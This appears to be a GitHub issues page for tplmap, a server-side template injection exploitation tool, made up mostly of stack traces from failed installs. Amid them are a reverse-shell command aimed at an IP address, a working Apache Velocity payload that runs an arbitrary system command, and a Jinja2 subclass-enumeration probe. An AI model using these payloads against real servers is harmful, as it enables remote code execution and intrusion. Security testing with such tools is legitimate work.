epinna / tplmap Goto Github PK
View Code? Open in Web Editor NEWServer-Side Template Injection and Code Injection Detection and Exploitation Tool
License: GNU General Public License v3.0
Server-Side Template Injection and Code Injection Detection and Exploitation Tool
License: GNU General Public License v3.0
All requirements are met too, when I add burp extension following error occurs:
at org.python.core.imp.import_next(imp.java:842)
at org.python.core.imp.import_logic(imp.java:904)
at org.python.core.imp.import_module_level(imp.java:978)
at org.python.core.imp.importName(imp.java:1062)
at org.python.core.ImportFunction.__call__(__builtin__.java:1280)
at org.python.core.PyObject.__call__(PyObject.java:431)
at org.python.core.__builtin__.__import__(__builtin__.java:1232)
at org.python.core.imp.importOne(imp.java:1081)
at utils.loggers$py.f$0(/home/krypton/tplmap/utils/loggers.py:57)
at utils.loggers$py.call_function(/home/krypton/tplmap/utils/loggers.py)
at org.python.core.PyTableCode.call(PyTableCode.java:167)
at org.python.core.PyCode.call(PyCode.java:18)
at org.python.core.imp.createFromCode(imp.java:436)
at org.python.core.imp.createFromPyClass(imp.java:236)
at org.python.core.imp.createFromPyClass(imp.java:205)
at org.python.core.imp.loadFromSource(imp.java:651)
at org.python.core.imp.find_module(imp.java:543)
at org.python.core.PyModule.impAttr(PyModule.java:106)
at org.python.core.imp.import_next(imp.java:842)
at org.python.core.imp.import_logic(imp.java:904)
at org.python.core.imp.import_module_level(imp.java:978)
at org.python.core.imp.importName(imp.java:1062)
at org.python.core.ImportFunction.__call__(__builtin__.java:1280)
at org.python.core.PyObject.__call__(PyObject.java:431)
at org.python.core.__builtin__.__import__(__builtin__.java:1232)
at org.python.core.imp.importFromAs(imp.java:1156)
at org.python.core.imp.importFrom(imp.java:1132)
at core.plugin$py.f$0(/home/krypton/tplmap/core/plugin.py:29)
at core.plugin$py.call_function(/home/krypton/tplmap/core/plugin.py)
at org.python.core.PyTableCode.call(PyTableCode.java:167)
at org.python.core.PyCode.call(PyCode.java:18)
at org.python.core.imp.createFromCode(imp.java:436)
at org.python.core.imp.createFromPyClass(imp.java:236)
at org.python.core.imp.createFromPyClass(imp.java:205)
at org.python.core.imp.loadFromSource(imp.java:651)
at org.python.core.imp.find_module(imp.java:543)
at org.python.core.PyModule.impAttr(PyModule.java:106)
at org.python.core.imp.import_next(imp.java:842)
at org.python.core.imp.import_logic(imp.java:904)
at org.python.core.imp.import_module_level(imp.java:978)
at org.python.core.imp.importName(imp.java:1062)
at org.python.core.ImportFunction.__call__(__builtin__.java:1280)
at org.python.core.PyObject.__call__(PyObject.java:431)
at org.python.core.__builtin__.__import__(__builtin__.java:1232)
at org.python.core.imp.importFromAs(imp.java:1156)
at org.python.core.imp.importFrom(imp.java:1132)
at plugins.languages.python$py.f$0(/home/krypton/tplmap/plugins/languages/python.py:90)
at plugins.languages.python$py.call_function(/home/krypton/tplmap/plugins/languages/python.py)
at org.python.core.PyTableCode.call(PyTableCode.java:167)
at org.python.core.PyCode.call(PyCode.java:18)
at org.python.core.imp.createFromCode(imp.java:436)
at org.python.core.imp.createFromPyClass(imp.java:236)
at org.python.core.imp.createFromPyClass(imp.java:205)
at org.python.core.imp.loadFromSource(imp.java:651)
at org.python.core.imp.find_module(imp.java:543)
at org.python.core.PyModule.impAttr(PyModule.java:106)
at org.python.core.imp.import_next(imp.java:842)
at org.python.core.imp.ensureFromList(imp.java:1024)
at org.python.core.imp.ensureFromList(imp.java:992)
at org.python.core.imp.import_module_level(imp.java:986)
at org.python.core.imp.importName(imp.java:1062)
at org.python.core.ImportFunction.__call__(__builtin__.java:1280)
at org.python.core.PyObject.__call__(PyObject.java:431)
at org.python.core.__builtin__.__import__(__builtin__.java:1232)
at org.python.core.imp.importFromAs(imp.java:1156)
at org.python.core.imp.importFrom(imp.java:1132)
at plugins.engines.mako$py.f$0(/home/krypton/tplmap/plugins/engines/mako.py:6)
at plugins.engines.mako$py.call_function(/home/krypton/tplmap/plugins/engines/mako.py)
at org.python.core.PyTableCode.call(PyTableCode.java:167)
at org.python.core.PyCode.call(PyCode.java:18)
at org.python.core.imp.createFromCode(imp.java:436)
at org.python.core.imp.createFromPyClass(imp.java:236)
at org.python.core.imp.createFromPyClass(imp.java:205)
at org.python.core.imp.loadFromSource(imp.java:651)
at org.python.core.imp.find_module(imp.java:543)
at org.python.core.PyModule.impAttr(PyModule.java:106)
at org.python.core.imp.import_next(imp.java:842)
at org.python.core.imp.import_logic(imp.java:904)
at org.python.core.imp.import_module_level(imp.java:978)
at org.python.core.imp.importName(imp.java:1062)
at org.python.core.ImportFunction.__call__(__builtin__.java:1280)
at org.python.core.PyObject.__call__(PyObject.java:431)
at org.python.core.__builtin__.__import__(__builtin__.java:1232)
at org.python.core.imp.importFromAs(imp.java:1156)
at org.python.core.imp.importFrom(imp.java:1132)
at core.checks$py.f$0(/home/krypton/tplmap/core/checks.py:141)
at core.checks$py.call_function(/home/krypton/tplmap/core/checks.py)
at org.python.core.PyTableCode.call(PyTableCode.java:167)
at org.python.core.PyCode.call(PyCode.java:18)
at org.python.core.imp.createFromCode(imp.java:436)
at org.python.core.imp.createFromPyClass(imp.java:236)
at org.python.core.imp.createFromPyClass(imp.java:205)
at org.python.core.imp.loadFromSource(imp.java:651)
at org.python.core.imp.find_module(imp.java:543)
at org.python.core.PyModule.impAttr(PyModule.java:106)
at org.python.core.imp.import_next(imp.java:842)
at org.python.core.imp.import_logic(imp.java:904)
at org.python.core.imp.import_module_level(imp.java:978)
at org.python.core.imp.importName(imp.java:1062)
at org.python.core.ImportFunction.__call__(__builtin__.java:1280)
at org.python.core.PyObject.__call__(PyObject.java:431)
at org.python.core.__builtin__.__import__(__builtin__.java:1232)
at org.python.core.imp.importFromAs(imp.java:1156)
at org.python.core.imp.importFrom(imp.java:1132)
at burp_extension.config_tab$py.f$0(/home/krypton/tplmap/burp_extension/config_tab.py:103)
at burp_extension.config_tab$py.call_function(/home/krypton/tplmap/burp_extension/config_tab.py)
at org.python.core.PyTableCode.call(PyTableCode.java:167)
at org.python.core.PyCode.call(PyCode.java:18)
at org.python.core.imp.createFromCode(imp.java:436)
at org.python.core.imp.createFromPyClass(imp.java:236)
at org.python.core.imp.createFromPyClass(imp.java:205)
at org.python.core.imp.loadFromSource(imp.java:651)
at org.python.core.imp.find_module(imp.java:543)
at org.python.core.PyModule.impAttr(PyModule.java:106)
at org.python.core.imp.import_next(imp.java:842)
at org.python.core.imp.import_module_level(imp.java:959)
at org.python.core.imp.importName(imp.java:1062)
at org.python.core.ImportFunction.__call__(__builtin__.java:1280)
at org.python.core.PyObject.__call__(PyObject.java:431)
at org.python.core.__builtin__.__import__(__builtin__.java:1232)
at org.python.core.imp.importFromAs(imp.java:1156)
at org.python.core.imp.importFrom(imp.java:1132)
at burp_extension.burp_extender$py.f$0(/home/krypton/tplmap/burp_extension/burp_extender.py:5)
at burp_extension.burp_extender$py.call_function(/home/krypton/tplmap/burp_extension/burp_extender.py)
at org.python.core.PyTableCode.call(PyTableCode.java:167)
at org.python.core.PyCode.call(PyCode.java:18)
at org.python.core.imp.createFromCode(imp.java:436)
at org.python.core.imp.createFromPyClass(imp.java:236)
at org.python.core.imp.createFromPyClass(imp.java:205)
at org.python.core.imp.loadFromSource(imp.java:651)
at org.python.core.imp.find_module(imp.java:543)
at org.python.core.PyModule.impAttr(PyModule.java:106)
at org.python.core.imp.import_next(imp.java:842)
at org.python.core.imp.import_logic(imp.java:904)
at org.python.core.imp.import_module_level(imp.java:978)
at org.python.core.imp.importName(imp.java:1062)
at org.python.core.ImportFunction.__call__(__builtin__.java:1280)
at org.python.core.PyObject.__call__(PyObject.java:431)
at org.python.core.__builtin__.__import__(__builtin__.java:1232)
at org.python.core.imp.importFromAs(imp.java:1156)
at org.python.core.imp.importFrom(imp.java:1132)
at org.python.pycode._pyx4.f$0(/home/krypton/tplmap/burp_extension.py:1)
at org.python.pycode._pyx4.call_function(/home/krypton/tplmap/burp_extension.py)
at org.python.core.PyTableCode.call(PyTableCode.java:167)
at org.python.core.PyCode.call(PyCode.java:18)
at org.python.core.Py.runCode(Py.java:1386)
at org.python.core.__builtin__.execfile_flags(__builtin__.java:535)
at org.python.util.PythonInterpreter.execfile(PythonInterpreter.java:286)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at burp.a3t.<init>(Unknown Source)
at burp.gcg.a(Unknown Source)
at burp.ao3.lambda$panelLoaded$0(Unknown Source)
at java.lang.Thread.run(Thread.java:748)
how to correct utilisation of reverse-shell
my error is
sudo python ./tplmap.py -u '' -e velocity --level=5 --reverse-shell 82.246.225.33 8080
[+] Tplmap 0.3
Automatic Server-Side Template Injection Detection and Exploitation Tool
[+] Testing if GET parameter 'tag' is injectable
[+] Velocity plugin is testing rendering with tag '#set($c=)\n${c}\n'
[+] Velocity plugin is testing ) code context escape with 91 variations
[+] Velocity plugin is testing #end#if(1==1)* code context escape with 91 variations
[+] Velocity plugin is testing blind injection
[+] Velocity plugin is testing )* code context escape with 91 variations
[+] Velocity plugin has confirmed blind injection
[+] Tplmap identified the following injection point:
GET parameter: tag
Engine: Velocity
Injection: a})*
Context: code
OS: undetected
Technique: blind
Capabilities:
Shell command execution: yes (blind)
Bind and reverse shell: yes
File write: yes (blind)
File read: no
Code evaluation: no
[!][tplmap] Exiting: global name 'messages' is not defined
Traceback (most recent call last):
File "./tplmap.py", line 26, in
main()
File "./tplmap.py", line 19, in main
checks.check_template_injection(Channel(args))
File "/opt/tplmap/tplmap/core/checks.py", line 299, in check_template_injection
tcpserver = TcpServer(int(port), timeout)
File "/opt/tplmap/tplmap/core/tcpserver.py", line 18, in init
self.connect_socket()
File "/opt/tplmap/tplmap/core/tcpserver.py", line 41, in connect_socket
log.error(messages.module_backdoor_reversetcp.error_binding_socket_s % str(e))
NameError: global name 'messages' is not defined
I do not understand there are very few doc online
The tplmap test environment is very useful for SSTI vulnerability learning. Everyone can easily get test environment by dockerize.
I already dockerized tplmap test environment. May I send it as a pull request?
Hey Emilio,
I'm a fan of weevely and this project also looks very promising.
I want to share a contribution to it. I thought about making a pull request but then I saw that I had to make lots of changes on the code, and I don't wanna ruin your work :)
This was the result of recent research I made on SSTI on Apache Velocity. The payloads on Portswigger's blog also didn't work for me so I set out to make my own research.
I ended up with this nice payload:
#set($run=$engine.getClass().forName("java.lang.Runtime"))#set($runtime=$run.getRuntime())#set($proc=$runtime.exec("COMMAND"))#set($null=$proc.waitFor())#set($istr=$proc.getInputStream())#set($chr=$engine.getClass().forName("java.lang.Character"))#set($output="")#set($string=$engine.getClass().forName("java.lang.String"))#foreach($i in [1..$istr.available()])#set($output=$output.concat($string.valueOf($chr.toChars($istr.read()))))#end$output
It works like a charm for me. Please try it out and let me know if it works on your tests.
When I tried to run tplmap, the following exception was raised.
$ ./tplmap.py -u 'https://www.target.com/app/?id=*'
[+] Tplmap 0.1
Automatic Server-Side Template Injection Detection and Exploitation Tool
[!][tplmap] Exiting: 'list' object has no attribute 'split'
Traceback (most recent call last):
File "./tplmap.py", line 26, in <module>
main()
File "./tplmap.py", line 19, in main
checks.check_template_injection(Channel(args))
File "/Users/pengfei/Projects/github/tplmap/core/channel.py", line 29, in __init__
self._parse_header()
File "/Users/pengfei/Projects/github/tplmap/core/channel.py", line 46, in _parse_header
for param_value in self.args.get('headers').split('\\r\\n'):
AttributeError: 'list' object has no attribute 'split'
It seems to be caused by that the default option of headers
is a empty list.
When start the tool .. output this error
Command
$ python tplmap.py -u http://127.0.0.1:5000/?u=test
Error
[!][tplmap] Exiting: 'module' object has no attribute 'disable_warnings'
My OS : Kali Linux
Already installed modules.
Lz1y say ~/OneDrive/tools/web/Burp suite/jython/bin ๎ฐ ./jython -m pip freeze
certifi==2019.6.16
chardet==3.0.4
idna==2.8
PyYAML==5.1.2
requests==2.22.0
urllib3==1.25.3
Error log:
Traceback (most recent call last):
File "/Users/ziyiliu/OneDrive/tools/web/Burp suite/tplmap/burp_extension.py", line 1, in <module>
from burp_extension.burp_extender import BurpExtender
File "/Users/ziyiliu/OneDrive/tools/web/Burp suite/tplmap/burp_extension/burp_extender.py", line 2, in <module>
from config_tab import ConfigTab
File "/Users/ziyiliu/OneDrive/tools/web/Burp suite/tplmap/burp_extension/config_tab.py", line 6, in <module>
from core.checks import plugins
File "/Users/ziyiliu/OneDrive/tools/web/Burp suite/tplmap/core/checks.py", line 20, in <module>
from core.channel import Channel
File "/Users/ziyiliu/OneDrive/tools/web/Burp suite/tplmap/core/channel.py", line 1, in <module>
import requests
File "/Users/ziyiliu/OneDrive/tools/web/Burp suite/jython/Lib/site-packages/requests/__init__.py", line 115, in <module>
from .api import request, get, head, post, patch, put, delete, options
File "/Users/ziyiliu/OneDrive/tools/web/Burp suite/jython/Lib/site-packages/requests/api.py", line 13, in <module>
from . import sessions
File "/Users/ziyiliu/OneDrive/tools/web/Burp suite/jython/Lib/site-packages/requests/sessions.py", line 27, in <module>
from .adapters import HTTPAdapter
File "/Users/ziyiliu/OneDrive/tools/web/Burp suite/jython/Lib/site-packages/requests/adapters.py", line 44, in <module>
from urllib3.contrib.socks import SOCKSProxyManager
File "/Users/ziyiliu/OneDrive/tools/web/Burp suite/jython/Lib/site-packages/requests/adapters.py", line 44, in <module>
from urllib3.contrib.socks import SOCKSProxyManager
File "/Users/ziyiliu/OneDrive/tools/web/Burp suite/jython/Lib/site-packages/urllib3/contrib/socks.py", line 40, in <module>
import socks
File "/Users/ziyiliu/OneDrive/tools/web/Burp suite/jython/Lib/site-packages/urllib3/contrib/socks.py", line 40, in <module>
import socks
File "/Users/ziyiliu/Library/Python/2.7/lib/python/site-packages/socks.py", line 267, in <module>
class _BaseSocket(socket.socket):
TypeError: Error when calling the metaclass bases
function() argument 1 must be code, not str
at org.python.core.Py.TypeError(Py.java:259)
at org.python.core.PyFunction.function___new__(PyFunction.java:103)
at org.python.core.PyFunction$exposed___new__.new_impl(Unknown Source)
at org.python.core.PyType.invokeNew(PyType.java:494)
at org.python.core.PyType.type___call__(PyType.java:1706)
at org.python.core.PyType.__call__(PyType.java:1696)
at org.python.core.PyObject.__call__(PyObject.java:496)
at org.python.core.Py.makeClass(Py.java:1878)
at org.python.core.Py.makeClass(Py.java:1839)
at org.python.core.Py.makeClass(Py.java:1831)
at socks$py.f$0(/Users/ziyiliu/Library/Python/2.7/lib/python/site-packages/socks.py:294)
at socks$py.call_function(/Users/ziyiliu/Library/Python/2.7/lib/python/site-packages/socks.py)
at org.python.core.PyTableCode.call(PyTableCode.java:167)
at org.python.core.PyCode.call(PyCode.java:18)
at org.python.core.imp.createFromCode(imp.java:436)
at org.python.core.imp.createFromPyClass(imp.java:236)
at org.python.core.imp.createFromPyClass(imp.java:205)
at org.python.core.imp.loadFromSource(imp.java:651)
at org.python.core.imp.find_module(imp.java:543)
at org.python.core.imp.import_next(imp.java:840)
at org.python.core.imp.import_module_level(imp.java:959)
at org.python.core.imp.importName(imp.java:1062)
at org.python.core.ImportFunction.__call__(__builtin__.java:1280)
at org.python.core.PyObject.__call__(PyObject.java:431)
at org.python.core.__builtin__.__import__(__builtin__.java:1232)
at org.python.core.imp.importOne(imp.java:1081)
at urllib3.contrib.socks$py.f$0(/private/var/folders/wh/yzv10dl94v74fxnnwsr14yl40000gn/T/pip_build_ziyiliu/urllib3/urllib3/contrib/socks.py:154)
at urllib3.contrib.socks$py.call_function(/private/var/folders/wh/yzv10dl94v74fxnnwsr14yl40000gn/T/pip_build_ziyiliu/urllib3/urllib3/contrib/socks.py)
at org.python.core.PyTableCode.call(PyTableCode.java:167)
at org.python.core.PyCode.call(PyCode.java:18)
at org.python.core.imp.createFromCode(imp.java:436)
at org.python.core.imp.createFromPyClass(imp.java:236)
at org.python.core.imp.createFromPyClass(imp.java:205)
at org.python.core.imp.loadFromSource(imp.java:651)
at org.python.core.imp.find_module(imp.java:543)
at org.python.core.PyModule.impAttr(PyModule.java:106)
at org.python.core.imp.import_next(imp.java:842)
at org.python.core.imp.import_logic(imp.java:904)
at org.python.core.imp.import_module_level(imp.java:978)
at org.python.core.imp.importName(imp.java:1062)
at org.python.core.ImportFunction.__call__(__builtin__.java:1280)
at org.python.core.PyObject.__call__(PyObject.java:431)
at org.python.core.__builtin__.__import__(__builtin__.java:1232)
at org.python.core.imp.importFromAs(imp.java:1156)
at org.python.core.imp.importFrom(imp.java:1132)
at requests.adapters$py.f$0(/private/var/folders/wh/yzv10dl94v74fxnnwsr14yl40000gn/T/pip_build_ziyiliu/requests/requests/adapters.py:84)
at requests.adapters$py.call_function(/private/var/folders/wh/yzv10dl94v74fxnnwsr14yl40000gn/T/pip_build_ziyiliu/requests/requests/adapters.py)
at org.python.core.PyTableCode.call(PyTableCode.java:167)
at org.python.core.PyCode.call(PyCode.java:18)
at org.python.core.imp.createFromCode(imp.java:436)
at org.python.core.imp.createFromPyClass(imp.java:236)
at org.python.core.imp.createFromPyClass(imp.java:205)
at org.python.core.imp.loadFromSource(imp.java:651)
at org.python.core.imp.find_module(imp.java:543)
at org.python.core.PyModule.impAttr(PyModule.java:106)
at org.python.core.imp.import_next(imp.java:842)
at org.python.core.imp.import_module_level(imp.java:959)
at org.python.core.imp.importName(imp.java:1062)
at org.python.core.ImportFunction.__call__(__builtin__.java:1280)
at org.python.core.PyObject.__call__(PyObject.java:431)
at org.python.core.__builtin__.__import__(__builtin__.java:1232)
at org.python.core.imp.importFromAs(imp.java:1156)
at org.python.core.imp.importFrom(imp.java:1132)
at requests.sessions$py.f$0(/private/var/folders/wh/yzv10dl94v74fxnnwsr14yl40000gn/T/pip_build_ziyiliu/requests/requests/sessions.py:758)
at requests.sessions$py.call_function(/private/var/folders/wh/yzv10dl94v74fxnnwsr14yl40000gn/T/pip_build_ziyiliu/requests/requests/sessions.py)
at org.python.core.PyTableCode.call(PyTableCode.java:167)
at org.python.core.PyCode.call(PyCode.java:18)
at org.python.core.imp.createFromCode(imp.java:436)
at org.python.core.imp.createFromPyClass(imp.java:236)
at org.python.core.imp.createFromPyClass(imp.java:205)
at org.python.core.imp.loadFromSource(imp.java:651)
at org.python.core.imp.find_module(imp.java:543)
at org.python.core.PyModule.impAttr(PyModule.java:106)
at org.python.core.imp.import_next(imp.java:842)
at org.python.core.imp.ensureFromList(imp.java:1024)
at org.python.core.imp.ensureFromList(imp.java:992)
at org.python.core.imp.import_module_level(imp.java:986)
at org.python.core.imp.importName(imp.java:1062)
at org.python.core.ImportFunction.__call__(__builtin__.java:1280)
at org.python.core.PyObject.__call__(PyObject.java:431)
at org.python.core.__builtin__.__import__(__builtin__.java:1232)
at org.python.core.imp.importFromAs(imp.java:1156)
at org.python.core.imp.importFrom(imp.java:1132)
at requests.api$py.f$0(/private/var/folders/wh/yzv10dl94v74fxnnwsr14yl40000gn/T/pip_build_ziyiliu/requests/requests/api.py:149)
at requests.api$py.call_function(/private/var/folders/wh/yzv10dl94v74fxnnwsr14yl40000gn/T/pip_build_ziyiliu/requests/requests/api.py)
at org.python.core.PyTableCode.call(PyTableCode.java:167)
at org.python.core.PyCode.call(PyCode.java:18)
at org.python.core.imp.createFromCode(imp.java:436)
at org.python.core.imp.createFromPyClass(imp.java:236)
at org.python.core.imp.createFromPyClass(imp.java:205)
at org.python.core.imp.loadFromSource(imp.java:651)
at org.python.core.imp.find_module(imp.java:543)
at org.python.core.PyModule.impAttr(PyModule.java:106)
at org.python.core.imp.import_next(imp.java:842)
at org.python.core.imp.import_module_level(imp.java:959)
at org.python.core.imp.importName(imp.java:1062)
at org.python.core.ImportFunction.__call__(__builtin__.java:1280)
at org.python.core.PyObject.__call__(PyObject.java:431)
at org.python.core.__builtin__.__import__(__builtin__.java:1232)
at org.python.core.imp.importFromAs(imp.java:1156)
at org.python.core.imp.importFrom(imp.java:1132)
at requests$py.f$0(/private/var/folders/wh/yzv10dl94v74fxnnwsr14yl40000gn/T/pip_build_ziyiliu/requests/requests/__init__.py:131)
at requests$py.call_function(/private/var/folders/wh/yzv10dl94v74fxnnwsr14yl40000gn/T/pip_build_ziyiliu/requests/requests/__init__.py)
at org.python.core.PyTableCode.call(PyTableCode.java:167)
at org.python.core.PyCode.call(PyCode.java:18)
at org.python.core.imp.createFromCode(imp.java:436)
at org.python.core.imp.createFromPyClass(imp.java:236)
at org.python.core.imp.createFromPyClass(imp.java:205)
at org.python.core.imp.loadFromSource(imp.java:651)
at org.python.core.imp.find_module(imp.java:543)
at org.python.core.imp.import_next(imp.java:840)
at org.python.core.imp.import_first(imp.java:870)
at org.python.core.imp.import_module_level(imp.java:972)
at org.python.core.imp.importName(imp.java:1062)
at org.python.core.ImportFunction.__call__(__builtin__.java:1280)
at org.python.core.PyObject.__call__(PyObject.java:431)
at org.python.core.__builtin__.__import__(__builtin__.java:1232)
at org.python.core.imp.importOne(imp.java:1081)
at core.channel$py.f$0(/Users/ziyiliu/OneDrive/tools/web/Burp suite/tplmap/core/channel.py:8)
at core.channel$py.call_function(/Users/ziyiliu/OneDrive/tools/web/Burp suite/tplmap/core/channel.py)
at org.python.core.PyTableCode.call(PyTableCode.java:167)
at org.python.core.PyCode.call(PyCode.java:18)
at org.python.core.imp.createFromCode(imp.java:436)
at org.python.core.imp.createFromSource(imp.java:396)
at org.python.core.imp.loadFromSource(imp.java:661)
at org.python.core.imp.find_module(imp.java:543)
at org.python.core.PyModule.impAttr(PyModule.java:106)
at org.python.core.imp.import_next(imp.java:842)
at org.python.core.imp.import_logic(imp.java:904)
at org.python.core.imp.import_module_level(imp.java:978)
at org.python.core.imp.importName(imp.java:1062)
at org.python.core.ImportFunction.__call__(__builtin__.java:1280)
at org.python.core.PyObject.__call__(PyObject.java:431)
at org.python.core.__builtin__.__import__(__builtin__.java:1232)
at org.python.core.imp.importFromAs(imp.java:1156)
at org.python.core.imp.importFrom(imp.java:1132)
at core.checks$py.f$0(/Users/ziyiliu/OneDrive/tools/web/Burp suite/tplmap/core/checks.py:141)
at core.checks$py.call_function(/Users/ziyiliu/OneDrive/tools/web/Burp suite/tplmap/core/checks.py)
at org.python.core.PyTableCode.call(PyTableCode.java:167)
at org.python.core.PyCode.call(PyCode.java:18)
at org.python.core.imp.createFromCode(imp.java:436)
at org.python.core.imp.createFromPyClass(imp.java:236)
at org.python.core.imp.createFromPyClass(imp.java:205)
at org.python.core.imp.loadFromSource(imp.java:651)
at org.python.core.imp.find_module(imp.java:543)
at org.python.core.PyModule.impAttr(PyModule.java:106)
at org.python.core.imp.import_next(imp.java:842)
at org.python.core.imp.import_logic(imp.java:904)
at org.python.core.imp.import_module_level(imp.java:978)
at org.python.core.imp.importName(imp.java:1062)
at org.python.core.ImportFunction.__call__(__builtin__.java:1280)
at org.python.core.PyObject.__call__(PyObject.java:431)
at org.python.core.__builtin__.__import__(__builtin__.java:1232)
at org.python.core.imp.importFromAs(imp.java:1156)
at org.python.core.imp.importFrom(imp.java:1132)
at burp_extension.config_tab$py.f$0(/Users/ziyiliu/OneDrive/tools/web/Burp suite/tplmap/burp_extension/config_tab.py:103)
at burp_extension.config_tab$py.call_function(/Users/ziyiliu/OneDrive/tools/web/Burp suite/tplmap/burp_extension/config_tab.py)
at org.python.core.PyTableCode.call(PyTableCode.java:167)
at org.python.core.PyCode.call(PyCode.java:18)
at org.python.core.imp.createFromCode(imp.java:436)
at org.python.core.imp.createFromPyClass(imp.java:236)
at org.python.core.imp.createFromPyClass(imp.java:205)
at org.python.core.imp.loadFromSource(imp.java:651)
at org.python.core.imp.find_module(imp.java:543)
at org.python.core.PyModule.impAttr(PyModule.java:106)
at org.python.core.imp.import_next(imp.java:842)
at org.python.core.imp.import_module_level(imp.java:959)
at org.python.core.imp.importName(imp.java:1062)
at org.python.core.ImportFunction.__call__(__builtin__.java:1280)
at org.python.core.PyObject.__call__(PyObject.java:431)
at org.python.core.__builtin__.__import__(__builtin__.java:1232)
at org.python.core.imp.importFromAs(imp.java:1156)
at org.python.core.imp.importFrom(imp.java:1132)
at burp_extension.burp_extender$py.f$0(/Users/ziyiliu/OneDrive/tools/web/Burp suite/tplmap/burp_extension/burp_extender.py:5)
at burp_extension.burp_extender$py.call_function(/Users/ziyiliu/OneDrive/tools/web/Burp suite/tplmap/burp_extension/burp_extender.py)
at org.python.core.PyTableCode.call(PyTableCode.java:167)
at org.python.core.PyCode.call(PyCode.java:18)
at org.python.core.imp.createFromCode(imp.java:436)
at org.python.core.imp.createFromPyClass(imp.java:236)
at org.python.core.imp.createFromPyClass(imp.java:205)
at org.python.core.imp.loadFromSource(imp.java:651)
at org.python.core.imp.find_module(imp.java:543)
at org.python.core.PyModule.impAttr(PyModule.java:106)
at org.python.core.imp.import_next(imp.java:842)
at org.python.core.imp.import_logic(imp.java:904)
at org.python.core.imp.import_module_level(imp.java:978)
at org.python.core.imp.importName(imp.java:1062)
at org.python.core.ImportFunction.__call__(__builtin__.java:1280)
at org.python.core.PyObject.__call__(PyObject.java:431)
at org.python.core.__builtin__.__import__(__builtin__.java:1232)
at org.python.core.imp.importFromAs(imp.java:1156)
at org.python.core.imp.importFrom(imp.java:1132)
at org.python.pycode._pyx5.f$0(/Users/ziyiliu/OneDrive/tools/web/Burp suite/tplmap/burp_extension.py:1)
at org.python.pycode._pyx5.call_function(/Users/ziyiliu/OneDrive/tools/web/Burp suite/tplmap/burp_extension.py)
at org.python.core.PyTableCode.call(PyTableCode.java:167)
at org.python.core.PyCode.call(PyCode.java:18)
at org.python.core.Py.runCode(Py.java:1386)
at org.python.core.__builtin__.execfile_flags(__builtin__.java:535)
at org.python.util.PythonInterpreter.execfile(PythonInterpreter.java:286)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at burp.bbx.<init>(Unknown Source)
at burp.c15.a(Unknown Source)
at burp.rj.lambda$panelLoaded$0(Unknown Source)
at java.lang.Thread.run(Thread.java:748)
PR #41 solves jinja2 false-negative, but it clovers nunjucks test because nunjucks and jinja2 uses same syntax.
If I change test_render like below
'test_render': '%(n1)s' % {
'n1' : '[].__class__.__mro__[1].__subclasses__()'
},
the html source of response is
So, I changed test_render_expected like below
'test_render_expected': '%(res)s' % {
'res' : 'jinja2.environment.Template'
}
But, It does not work.
How to solve it?
This templating engine usually found in ASP.NET can be exploited too.
There are a few pointers in an article I wrote.
Unfortunately I did not have the time yet to implement it in tplmap, so I drop it here for reference.
hey pro
iam bugbounty hunter
burp extension do not work
up to date git pull
trace
Traceback (most recent call last):
File "/opt/tplmap/tplmap/burp_extension.py", line 9, in
from core.checks import plugins
File "/opt/tplmap/tplmap/core/checks.py", line 1, in
from plugins.engines.mako import Mako
File "/opt/tplmap/tplmap/plugins/engines/mako.py", line 1, in
from plugins.languages import python
File "/opt/tplmap/tplmap/plugins/languages/python.py", line 2, in
from core.plugin import Plugin
File "/opt/tplmap/tplmap/core/plugin.py", line 3, in
from utils.loggers import log
File "/opt/tplmap/tplmap/utils/loggers.py", line 4, in
import utils.config
File "/opt/tplmap/tplmap/utils/config.py", line 3, in
import yaml
ImportError: No module named yaml
at org.python.core.Py.ImportError(Py.java:328)
at org.python.core.imp.import_first(imp.java:877)
at org.python.core.imp.import_module_level(imp.java:972)
at org.python.core.imp.importName(imp.java:1062)
at org.python.core.ImportFunction.__call__(__builtin__.java:1280)
at org.python.core.PyObject.__call__(PyObject.java:431)
at org.python.core.__builtin__.__import__(__builtin__.java:1232)
at org.python.core.imp.importOne(imp.java:1081)
at utils.config$py.f$0(/opt/tplmap/tplmap/utils/config.py:22)
at utils.config$py.call_function(/opt/tplmap/tplmap/utils/config.py)
at org.python.core.PyTableCode.call(PyTableCode.java:167)
at org.python.core.PyCode.call(PyCode.java:18)
at org.python.core.imp.createFromCode(imp.java:436)
at org.python.core.imp.createFromPyClass(imp.java:236)
at org.python.core.imp.createFromPyClass(imp.java:205)
at org.python.core.imp.loadFromSource(imp.java:651)
at org.python.core.imp.find_module(imp.java:543)
at org.python.core.PyModule.impAttr(PyModule.java:106)
at org.python.core.imp.import_next(imp.java:842)
at org.python.core.imp.import_logic(imp.java:904)
at org.python.core.imp.import_module_level(imp.java:978)
at org.python.core.imp.importName(imp.java:1062)
at org.python.core.ImportFunction.__call__(__builtin__.java:1280)
at org.python.core.PyObject.__call__(PyObject.java:431)
at org.python.core.__builtin__.__import__(__builtin__.java:1232)
at org.python.core.imp.importOne(imp.java:1081)
at utils.loggers$py.f$0(/opt/tplmap/tplmap/utils/loggers.py:57)
at utils.loggers$py.call_function(/opt/tplmap/tplmap/utils/loggers.py)
at org.python.core.PyTableCode.call(PyTableCode.java:167)
at org.python.core.PyCode.call(PyCode.java:18)
at org.python.core.imp.createFromCode(imp.java:436)
at org.python.core.imp.createFromPyClass(imp.java:236)
at org.python.core.imp.createFromPyClass(imp.java:205)
at org.python.core.imp.loadFromSource(imp.java:651)
at org.python.core.imp.find_module(imp.java:543)
at org.python.core.PyModule.impAttr(PyModule.java:106)
at org.python.core.imp.import_next(imp.java:842)
at org.python.core.imp.import_logic(imp.java:904)
at org.python.core.imp.import_module_level(imp.java:978)
at org.python.core.imp.importName(imp.java:1062)
at org.python.core.ImportFunction.__call__(__builtin__.java:1280)
at org.python.core.PyObject.__call__(PyObject.java:431)
at org.python.core.__builtin__.__import__(__builtin__.java:1232)
at org.python.core.imp.importFromAs(imp.java:1156)
at org.python.core.imp.importFrom(imp.java:1132)
